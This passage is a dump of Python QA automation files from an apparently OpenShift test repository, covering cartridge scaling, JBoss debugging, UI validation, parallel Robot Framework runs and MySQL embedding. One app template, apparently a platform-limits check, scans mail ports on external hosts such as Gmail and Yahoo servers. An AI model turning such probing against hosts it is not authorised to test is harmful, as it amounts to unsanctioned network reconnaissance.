\"[US2282][BusinessIntegration] MIN_GEAR setting in cartridge\"\n\n        common.env_setup()\n\n    def finalize(self):\n        self.change_descriptor(1)\n\nclass ScalingMinGears(OpenShiftTest):\n    \n    def change_descriptor(self, num = 1):\n        ( ret_code, ret_output ) = common.run_remote_cmd_as_root(\n            \"sed -i -e 's/Min: ./Min: %d/' /usr/libexec/openshift/cartridges/%s/info/manifest.yml\" % ( num, common.app_types[self.app_type] )\n        )\n        if self.get_run_mode() == \"OnPremise\":\n            cmd=\"service openshift-broker restart\"\n        else:\n            cmd=\"service rhc-broker restart\"\n        if ret_code == 0:\n            ( ret_code, ret_output ) = common.run_remote_cmd_as_root(cmd)\n        return ret_code\n\n    def test_method(self):\n        self.info(\"===============================\")\n        self.info(\"1. Changing MIN_GEAR settings in the cartridge descriptor file\")\n        self.info(\"===============================\")\n        status = self.change_descriptor(3)\n        self.assert_equal(status, 0, \"Error while manipulating manifest.yml\")\n\n        # Wait for rhc-broker to start\n        time.sleep(15)\n        \n        self.info(\"===============================\")\n        self.info(\"2. Creating a scalable application\")\n        self.info(\"===============================\")\n        status = common.create_app(self.app_name, common.app_types[self.app_type], scalable = True, clone_repo = False, timeout=360)\n        self.assert_equal(status, 0, \"Unable to create an app\")\n        \n        self.info(\"===============================\")\n        self.info(\"3. Checking the number of gears\")\n        self.info(\"===============================\")\n        ( gear_info, gear_count ) = self.config.rest_api.get_gears(self.app_name)\n        self.assert_equal(gear_count, 4, \"Gear count must be 4\")\n        \n        self.info(\"===============================\")\n        self.info(\"4. 
Scaling down\")\n self.info(\"===============================\")\n (status, resp) = self.config.rest_api.app_scale_down(self.app_name)\n self.assert_match(status, 'Unprocessable Entity', \"Scale-down operation must fail\")\n \n # Everything is OK\n return self.passed(self.summary)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ScalingMinGears)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5659946799278259, "alphanum_fraction": 0.5785470008850098, "avg_line_length": 29.20689582824707, "blob_id": "65247d46928251e75e24bd5e74aea1c78f60851d", "content_id": "4af4f800ed976962bdbb0a2c188019452b3a7f99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2629, "license_type": "no_license", "max_line_length": 149, "num_lines": 87, "path": "/automation/open/testmodules/RT/cartridge/jboss_debug_port.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: jboss_debug_port.py\n# Date: 2012/02/13 07:02\n# Author: [email protected]\n#\n\nimport sys\nimport os\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary =\"[US1614][Runtime][rhc-cartridge] Enable jboss debug port\"\n self.ftcms_testcase_id = 129218\n self.app_name = common.getRandomString(10)\n\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass JBossDebugPort(OpenShiftTest):\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\"Create a sample JBoss app\" ,\n common.create_app,\n function_parameters=[self.app_name,common.app_types['jbossas'], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Enable jpda\",\n '''\n cd %s &&\n touch .openshift/markers/enable_jpda &&\n git add .openshift/markers/enable_jpda &&\n git commit . 
-m 'enable jboss debug' &&\n            git push\n            '''%(self.app_name),\n            expect_return=0))\n\n        pexpect_cmd = [\n            ('sendline', 'jdb -attach $OPENSHIFT_INTERNAL_IP:8787'),\n            ('expect', 'Initializing jdb'),\n            ('expect', '>'),\n            ('sendline', 'version'),\n            ('expect', 'This is jdb version.*'),\n            ('sendline', 'quit'),\n            ('sendline', 'exit')]\n\n        self.steps_list.append(testcase.TestCaseStep(\"connect app via rhcsh, or forward debug port via rhc-port-forward\",\n            common.rhcsh,\n            function_parameters = [self.app_name, pexpect_cmd],\n            expect_return=0))\n\n        case = testcase.TestCase(self.summary, self.steps_list)\n        try:\n            case.run()\n        except testcase.TestCaseStepFail:\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\n        if case.testcase_status == 'PASSED':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        if case.testcase_status == 'FAILED':\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(JBossDebugPort)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n# end of jboss_debug_port.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.637601375579834, "alphanum_fraction": 0.6509270071983337, "avg_line_length": 44.421051025390625, "blob_id": "c9b8258af54015731c68272157d67690b4c5e6fc", "content_id": "c292e92bfee01337a5822ab2bf5853c385e92ff9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3452, "license_type": "no_license", "max_line_length": 170, "num_lines": 76, "path": "/automation/open/testmodules/UI/web/US1797_135722.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "'''\n[US1797][UI][Account Management]Create domain from link in \"My Account\" page\n'''\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport HTMLTestRunner\n\nclass US17971357222(unittest.TestCase):\n    def setUp(self):\n        self.driver = \"\"\n        self.base_url = \"\"\n        self.profile = \"\"\n        self.verificationErrors = []\n        baseutils.initiate(self)\n        self.confirm_link=self.cfg.confirm_url_express\n\n    \n    def test_u_s17971357222(self):\n        driver = self.driver\n        baseutils.login(self,self.cfg.new_user,self.cfg.password)\n# domain shouldn't exist yet\n        if (baseutils.has_domain(self)):\n            time.sleep(10)\n            raise Exception(\"The domain already exists\")\n\n        baseutils.go_to_account_page(self)\n        invalid = [(\"longerlongerlongerlonger\", u\"Namespace 'longerlongerlongerlonger' is too long. 
Maximum length is 16 characters.\") ]\n for t in invalid:\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(t[0])\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.wait_element_present_by_id(self, \"domain_submit\")\n baseutils.assert_text_regexp_match_by_xpath(self, t[1],\"id('domain_name_group')/div/div[1]/p\")\n time.sleep(2)\n #zero string\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.wait_element_present_by_id(self, \"domain_submit\")\n baseutils.assert_text_regexp_match_by_xpath(self, u\"This field is required.\", \"id('app-errors')/p\")\n\n for t in baseutils.Invalid_input:\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(t)\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.assert_text_equal_by_xpath(self, \"Only letters and numbers are allowed\",\"id('app-errors')/p\")\n time.sleep(2)\n##\n used_domain=self.cfg.exist_domain\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(used_domain)\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.assert_text_regexp_match_by_xpath(self, u\"Namespace '%s' is already in use. Please choose another.\"%used_domain, \"id('domain_name_group')/div/div[1]/p\")\n new_domain=baseutils.get_random_str(10)\n print \"DEBUG:\", new_domain\n driver.find_element_by_id(\"domain_name\").clear()\n driver.find_element_by_id(\"domain_name\").send_keys(new_domain)\n driver.find_element_by_id(\"domain_submit\").click()\n baseutils.wait_element_present_by_link_text(self, \"Change your namespace...\")\n baseutils.assert_text_equal_by_xpath(self, \"http://applicationname\"+u\"\\u2013\"+\"%s.rhcloud.com\"%new_domain, \"id('content')/div[2]/div[1]/section[2]/div[1]\")\n \n \n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5923740863800049, "alphanum_fraction": 0.5964248180389404, "avg_line_length": 37.6224479675293, "blob_id": "49e20ab4fc78ebdf159b1c7e362e52d86e8904f7", "content_id": "1e59709188a81a059692eddebb630ad0f94395bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11356, "license_type": "no_license", "max_line_length": 160, "num_lines": 294, "path": "/automation/parallel/Parallel.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# Copyright 2008-2013 Nokia Siemens Networks Oyj\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nfrom __future__ import with_statement\nimport subprocess\nimport time\nfrom random import randint\nimport os\nimport re\nimport sys\nfrom robot.libraries import BuiltIn\nfrom robot.utils 
import html_escape, ArgumentParser\nfrom robot.version import get_version\n\n\nclass Parallel(object):\n \"\"\"\n Library for executing tests in parallel from inside of a robot test case.\n Tests are executed in subprocesses.\n\n You can add arguments to all parallel test runs from `library importing`,\n for a set of parallel tests with `Add Arguments For Parallel Tests` and\n for an individual parallel test by passing the arguments in `Start Parallel Test`.\n\n The following command line arguments (also from argument files) are automatically\n passed to parallel tests:\n --loglevel, --runmode, --pythonpath, --variable, --variablefile\n\n Example:\n | *Settings* |\n | Library | Parallel | pybot |\n\n\n | *Test Cases* |\n | Runner |\n | | Run Parallel Tests | Hello | World |\n | Hello |\n | | [Tags] | parallel |\n | | Log | Hello ${WORLD} |\n | World |\n | | [Tags] | parallel |\n | | Log | ${HELLO} World |\n\n `pybot --exclude parallel --variable HELLO:Hello --variable WORLD:World .`\n \"\"\"\n\n def __init__(self, runner_script, *arguments):\n \"\"\"\n `runner_script` is pybot or jybot or a custom script.\n\n `arguments` are default arguments given to every test execution.\n\n Example:\n | Library | Parallel | pybot | --variable | variable:value | --loglevel | DEBUG |\n \"\"\"\n self._script = runner_script\n self._arguments = self._get_arguments(arguments)\n self._processes = []\n self._data_source = None\n\n def _get_arguments(self, additional_arguments):\n options,_ = ArgumentParser(_get_cmd_arguments()).parse_args(sys.argv[1:])\n args = []\n for arg in ['loglevel', 'runmode', 'variable', 'variablefile']:\n args += self._get_type_arguments(options, arg)\n args += list(additional_arguments)\n return args\n\n def _get_type_arguments(self, options, key):\n value = options[key]\n args = []\n if value is not None:\n if not isinstance(value, list):\n value = [value]\n for var in value:\n args += ['--%s' % key, var]\n return args\n\n def add_arguments_for_parallel_tests(self, *arguments):\n \"\"\"Adds `arguments` to be used when parallel test is started.\n\n `arguments` is a list of arguments to pass to parallel executions.\n\n In the following example variable my_var is used in both of the tests\n started with the keyword `Run Parallel Tests`:\n | Add Arguments For Parallel Tests | --variable | my_var:value |\n | Run Parallel Tests | Test | Another Test |\n \"\"\"\n self._arguments += list(arguments)\n\n def set_data_source_for_parallel_tests(self, data_source):\n \"\"\"Sets data source which is used when parallel tests are started.\n\n `data_source` is path to file which contains the test/tests which are\n started/executed with keywords `Start Parallel Test` or `Run Parallel\n Tests`.\n\n If tests to be executed are in the same suite and Robot Framework 2.5\n or later is used, there is no need to use this keyword as `data_source`\n can be automatically resolved.\n\n Examples:\n | Set Data Source For Parallel Tests | ${CURDIR}${/}my_parallel_suite.txt |\n | Start Parallel Test | My Parallel Test |\n | Wait All Parallel Tests |\n \"\"\"\n self._data_source = data_source\n\n def start_parallel_test(self, test_name, *arguments):\n \"\"\"Starts executing test with given `test_name` and `arguments`.\n\n `arguments` is a list of Robot Framework command line arguments passed to\n the started test execution. It should not include data source. Use\n `Set Data Source For Parallel Tests` keyword for setting the data\n source. 
Additional arguments can also be set in library import and with\n `Add Arguments For Parallel Tests` keyword.\n\n Returns a process object that represents this execution.\n\n Example:\n | Set Data Source For Parallel Tests | MySuite.txt |\n | Start Parallel Test | Test From My Suite |\n | Set Data Source For Parallel Tests | MyFriendsSuite.txt |\n | Start Parallel Test | Test From My Friends Suite |\n | Wait All Parallel Tests |\n \"\"\"\n if self._data_source is None:\n self._data_source = BuiltIn.BuiltIn().replace_variables('${SUITE_SOURCE}')\n process = _ParaRobo(test_name, self._data_source,\n self._arguments+list(arguments))\n process.run(self._script)\n self._processes.append(process)\n return process\n\n def run_parallel_tests(self, *test_names):\n \"\"\"Executes all given tests parallel and wait those to be ready.\n\n Arguments can be set with keyword `Add Arguments For Parallel Tests`\n and data source with keyword `Set Data Source For Parallel Tests`.\n\n Example:\n | Add Arguments For Parallel Tests | --variable | SOME_VARIABLE:someValue |\n | Set Data Source For Parallel Tests | MySuite.txt |\n | Run Parallel Tests | My Parallel Test | My Another Parallel Test |\n\n When the parallel tests are from different data sources see the example in `Start Parallel Test`.\n \"\"\"\n processes = []\n for name in test_names:\n processes += [self.start_parallel_test(name)]\n self.wait_parallel_tests(*processes)\n\n def wait_parallel_tests(self, *processes):\n \"\"\"Waits given `processes` to be ready and fails if any of the tests failed.\n\n `Processes` are list of test execution processes returned from keyword\n `Start Parallel Test`.\n\n Example\n | ${test 1}= | Start Parallel Test | First Test |\n | ${test 2}= | Start Parallel Test | Test That Runs All The Time |\n | Wait Parallel Tests | ${test 1} |\n | ${test 3}= | Start Parallel Test | Third Test |\n | Wait Parallel Tests | ${test 2} | ${test 3} |\n \"\"\"\n failed = []\n for process in processes:\n if process.wait() != 0:\n failed += [process.test]\n process.report()\n self._processes.remove(process)\n if failed:\n raise AssertionError(\"Following tests failed:\\n%s\" % \"\\n\".join(failed))\n\n def wait_all_parallel_tests(self):\n \"\"\"Wait all started test executions to be ready and fails if any of those failed.\"\"\"\n self.wait_parallel_tests(*self._processes)\n\n def stop_all_parallel_tests(self):\n \"\"\"Forcefully stops all the test executions.\n\n NOTE: Requires Python 2.6 or later.\n \"\"\"\n for process in self._processes:\n process.stop_test_execution()\n self._processes = []\n\n\nclass _ParaRobo(object):\n\n def __init__(self, test, data_source, arguments):\n self.test = test\n self._data_source = data_source\n self._args = arguments\n self._built_in = BuiltIn.BuiltIn()\n id = self._create_id()\n self._output = 'output_%s.xml' % id\n self._log = 'log_%s.html' % id\n self._output_dir = self._built_in.replace_variables(\"${OUTPUT DIR}\")\n self._monitor_out = os.path.join(self._output_dir, 'monitor_%s.txt' % id)\n\n @property\n def _suite_name(self):\n name = os.path.splitext(os.path.basename(self._data_source))[0]\n name = name.split('__', 1)[-1] # Strip possible prefix\n name = name.replace('_', ' ').strip()\n if name.islower():\n name = name.title()\n return name\n\n def _create_id(self):\n return \"%s_%s\" % (randint(0, 10000), time.strftime('%Y%m%d_%H%m%S.')+\\\n ('%03d' % (int(time.time()*1000) % 1000)))\n\n def run(self, script):\n self._monitor_file = open(self._monitor_out, 'w')\n cmd = [script,\n '--outputdir', 
self._output_dir,\n '--output', self._output,\n '--report', 'None',\n '--log', self._log,\n '--monitorcolors', 'off',\n '--test', self.test]+\\\n self._args + [self._data_source]\n print \"Starting test execution: %s\" % \" \".join(cmd)\n self._process = subprocess.Popen(cmd,\n shell=os.sep == '\\\\',\n stdout=self._monitor_file,\n stderr=self._monitor_file,\n env=self._get_environment_variables())\n\n def _get_environment_variables(self):\n environment_variables = os.environ.copy()\n if environment_variables.has_key(\"ROBOT_SYSLOG_FILE\"):\n del(environment_variables[\"ROBOT_SYSLOG_FILE\"])\n return environment_variables\n\n def wait(self):\n rc = self._process.wait()\n self._monitor_file.close()\n return rc\n\n def report(self):\n with open(self._monitor_out, 'r') as monitor_file:\n monitor_output = monitor_file.read()\n try:\n os.remove(self._monitor_out)\n except:\n pass\n match = re.search('^Log: (.*)$', monitor_output, re.MULTILINE)\n monitor_output = self._replace_stdout_log_message_levels(monitor_output)\n monitor_output = html_escape(monitor_output)\n if match:\n monitor_output = monitor_output.replace(match.group(1), '<a href=\"%s#test_%s.%s\">%s</a>' % (self._log, self._suite_name, self.test, match.group(1)))\n monitor_output = self._add_colours(monitor_output)\n print \"*HTML* %s\" % monitor_output\n\n def _replace_stdout_log_message_levels(self, output):\n for level in ['TRACE', 'WARN', 'DEBUG', 'INFO', 'HTML']:\n output = output.replace('\\n*%s*' % level, '\\n *%s*' % level)\n return output\n\n def _add_colours(self, output):\n for name, colour in [(\"PASS\", \"pass\"), (\"FAIL\", \"fail\"), (\"ERROR\", \"fail\")]:\n output = output.replace(' %s ' % name, ' <span class=\"%s\">%s</span> ' % (colour, name))\n return output\n\n def stop_test_execution(self):\n try:\n self._process.terminate()\n except AttributeError:\n pass\n self.report()\n\n\ndef _get_cmd_arguments():\n import robot\n runner_path = os.path.join(os.path.dirname(os.path.abspath(robot.__file__)),\n 'run.py')\n with open(runner_path, 'r') as runner_file:\n runner_content = runner_file.read()\n return re.search('\"\"\"(.+)\"\"\"', runner_content, re.DOTALL).groups()[0]\n\n" }, { "alpha_fraction": 0.5870253443717957, "alphanum_fraction": 0.6007384061813354, "avg_line_length": 29.079364776611328, "blob_id": "80d9f4437d3c88404c6054215857878c475bad07", "content_id": "09177767c662f3cb3e77e0570eb576f5fc2c50f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1896, "license_type": "no_license", "max_line_length": 109, "num_lines": 63, "path": "/automation/open/testmodules/RT/cartridge/local_lib_mirrors_java.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/env python\n\"\"\"\nLinqing Lu\[email protected]\nDec 12, 2011\n\n[US1309][rhc-cartridge]Create local lib mirrors for Java framework\nhttps://tcms.engineering.redhat.com/case/122394/\n\"\"\"\nimport os\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US1309][rhc-cartridge]Create local lib mirrors for Java framework\")\n common.env_setup()\n self.app = { 'name' : common.getRandomString(7), \n 'type' : common.app_types['jbossas'] }\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app['name']))\n os.system(\"rm -rf kitchensink-example\")\n\n\nclass LocalLibMirrorsJava(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Create an %s app: %s\" % (self.app['type'],self.app['name']),\n 
common.create_app,\n function_parameters = [self.app['name'], self.app['type']],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n\n self.add_step(\"Get jbossas-quickstart codes\",\n \"rm -rf kitchensink-example; git clone https://github.com/openshift/kitchensink-example.git\",\n expect_return = 0)\n\n self.add_step(\"Git push codes\",\n \"cd %s && cp -rf ../kitchensink-example/* . && git add . && git commit -am test && git push\" \n % self.app['name'],\n expect_str = ['BUILD SUCCESS', 'Downloaded: http.*nexus'],\n expect_return = 0)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LocalLibMirrorsJava)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5927679538726807, "alphanum_fraction": 0.5996556282043457, "avg_line_length": 35.2890625, "blob_id": "17069558995ca34d9faa0395cb8962996db50871", "content_id": "bb8eacf1279859a089534c3d73900231725a78bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4646, "license_type": "no_license", "max_line_length": 200, "num_lines": 128, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql_to_rack.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen\[email protected]\nApr 05, 2012\n[rhc-cartridge] embed MySQL instance to RACK application\nhttps://tcms.engineering.redhat.com/case/122452/?from_plan=4962\n\"\"\"\nimport os\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge] embed MySQL instance to an RACK application\"\n try:\n variant = self.get_variant()\n except:\n variant = 'ruby'\n self.app_type = common.app_types[variant]\n self.app_name = \"ruby4mysql\"+common.getRandomString(4)\n self.mysql_v = common.cartridge_types['mysql']\n self.steps_list = []\n self.info(\"VARIANT: %s\"%variant)\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass EmbedMysqlToRack(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create a RACK app\", common.create_app, \n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"The app should be created successfully\",\n expect_return=0))\n \n self.steps_list.append(testcase.TestCaseStep(\"Embed mysql to the app\", \n common.embed,\n function_parameters = [ self.app_name, \"add-%s\" %self.mysql_v],\n expect_description=\"The mysql cartridge should be embedded successfully\",\n expect_return=0))\n\n def mod_config_ru(self):\n cmd = \"\"\"cd %s && cat <<'EOF' >>config.ru &&\nrequire 'mysql'\nmap '/mysql' do\n content = \"\"\n begin\n dbh = Mysql.real_connect(ENV['OPENSHIFT_MYSQL_DB_HOST'], ENV['OPENSHIFT_MYSQL_DB_USERNAME'], ENV['OPENSHIFT_MYSQL_DB_PASSWORD'], ENV['OPENSHIFT_APP_NAME'], Integer(ENV['OPENSHIFT_MYSQL_DB_PORT']))\n dbh.query(\"DROP TABLE IF EXISTS ucctalk\")\n dbh.query(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\")\n dbh.query(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl 
DBI')\")\n    content += \"<p>#{dbh.affected_rows} rows were inserted:</p>\"\n    res = dbh.query(\"SELECT * FROM ucctalk\")\n    while row = res.fetch_row do\n      content += row.join(\", \")+\"<br>\"\n    end\n    res.free\n  rescue MysqlError => e\n    content += \"Error code: #{e.errno}\"\n    content += \"Error message: #{e.error}\"\n  ensure\n    dbh.close if dbh\n  end\n  mysql = proc do |env|\n    [200, { \"Content-Type\" => \"text/html\" }, [content]]\n  end\n  run mysql\nend\nEOF\ngit commit -m \"changes\" -a && git push\"\"\"%self.app_name\n            (status, output) = common.command_getstatusoutput(cmd)\n            return status\n\n        self.steps_list.append(testcase.TestCaseStep(\"Modify config.ru for accepting /mysql\",\n                mod_config_ru,\n                function_parameters=[self],\n                expect_description=\"The modifications should be done without errors\",\n                expect_return=0))\n\n        def verify(self):\n            url = OSConf.get_app_url(self.app_name)\n            return common.grep_web_page(url+\"/mysql\", 'Jeremy')\n\n        self.steps_list.append(testcase.TestCaseStep(\"Verify the MySQL functionality...\",\n                verify,\n                function_parameters=[self],\n                expect_description=\"The page should be added without errors\",\n                expect_return=0))\n\n        self.steps_list.append(testcase.TestCaseStep(\"Remove embedded mysql from the app\", \n                common.embed,\n                function_parameters = [ self.app_name, \"remove-%s\" %self.mysql_v],\n                expect_description=\"The mysql should be removed successfully\",\n                expect_return=0))\n\n        case = testcase.TestCase(self.summary, self.steps_list)\n        try:\n            case.run()\n        except testcase.TestCaseStepFail:\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\n        if case.testcase_status == 'PASSED':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        if case.testcase_status == 'FAILED':\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(EmbedMysqlToRack)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.501467227935791, "alphanum_fraction": 0.512226939201355, "avg_line_length": 34.252872467041016, "blob_id": "ae28a43b7efda73e7e2eb0c479bce89ff4d2754d", "content_id": "79e50ec8cdb713f36449aed3339131079ab59f80", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3067, "license_type": "no_license", "max_line_length": 113, "num_lines": 87, "path": "/automation/open/testmodules/RT/limits/app_template/outbound_mail_port/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n    execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n    pass\n#\n# IMPORTANT: Put any additional includes below this line. 
If placed above this\n# line, it's possible required libraries won't be in your searchable path\n# \nimport socket\nimport select\n\ndef application(environ, start_response):\n\n    ctype = 'text/plain'\n    if environ['PATH_INFO'] == '/health':\n        response_body = \"1\"\n    elif environ['PATH_INFO'] == '/scan':\n        hostlist=( \n            \"127.0.0.1\", \"imap.gmail.com\", \"smtp.gmail.com\", \n            \"smtp.mail.yahoo.com\", \"pop.mail.yahoo.com\"\n        )\n        portlist=(\n            \"imap\", \"imap3\", \"imaps\", \"pop2\", \"pop3\", \"pop3s\", \n            \"submission\", \"smtp\", \"smtps\"\n        )\n\n        sockets=dict()\n        poller=select.epoll()\n        response_body=\"\"\n        for host in hostlist:\n            for port in portlist:\n                try:\n                    hent = socket.getaddrinfo(host, port)[0][4]\n                    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n                    sock.setblocking(False)\n                    poller.register(sock.fileno())\n                    sockets[sock.fileno()]=[sock, host, port]\n                    sock.connect_ex(hent)\n                except Exception, e:\n                    response_body+=\"%s:%s exception: %s\\n\" % (host, port, str(e))\n\n        while sockets:\n            events = poller.poll(5)\n            if events:\n                for fileno, event in events:\n                    poller.unregister(fileno)\n                    e=sockets[fileno][0].getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)\n                    if e == 0:\n                        response_body+=\"%s:%s Connected\\n\" % (sockets[fileno][1],\n                                                              sockets[fileno][2])\n                    else:\n                        response_body+=\"%s:%s Refused\\n\" % (sockets[fileno][1],\n                                                            sockets[fileno][2]) \n                    sockets[fileno][0].close()\n                    del(sockets[fileno])\n            else:\n                break\n        \n        for sock in sockets:\n            sockets[sock][0].close()\n            response_body+=\"%s:%s Timed Out\\n\" % (sockets[sock][1], sockets[sock][2])\n\n        poller.close()\n\n    else:\n        response_body = 'OpenShift'\n\n    status = '200 OK'\n    response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n    #\n    start_response(status, response_headers)\n    return [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n    from wsgiref.simple_server import make_server\n    httpd = make_server('localhost', 8051, application)\n    # Wait for a single request, serve it and quit.\n    httpd.handle_request()\n" }, { "alpha_fraction": 0.6719924807548523, "alphanum_fraction": 0.6757518649101257, "avg_line_length": 18.703702926635742, "blob_id": "557b6111edfc458edfd9a9fe8d3e6586f1cc7947", "content_id": "1b811b21f4503d4ae048a169c6894052eb78adaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1064, "license_type": "no_license", "max_line_length": 76, "num_lines": 54, "path": "/automation/open/testmodules/Collections/Demo/Demo02.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\ndemo test script for running variants\n\n\"\"\"\nimport rhtest\nimport database\nimport time\nimport os\n\n#from lib import testcase, common, OSConf\nimport openshift\nimport common\nimport testcase\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n\n    def initialize(self):\n        self.user_email = self.config.OPENSHIFT_user_email\n        self.user_passwd = self.config.OPENSHIFT_user_passwd\n        self.rest = self.config.rest\n        common.env_setup()\n\n    def finalize(self):\n        pass\n\n\nclass Demo02(OpenShiftTest):\n    def test_method(self):\n\n        for variant in self.config.test_variants['variants']:\n            self.app_type = common.app_types[variant]\n            #\n            status, res = self.rest.app_create(self.app_name, self.app_type)\n\n\n        return self.failed(\"test failed.\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    
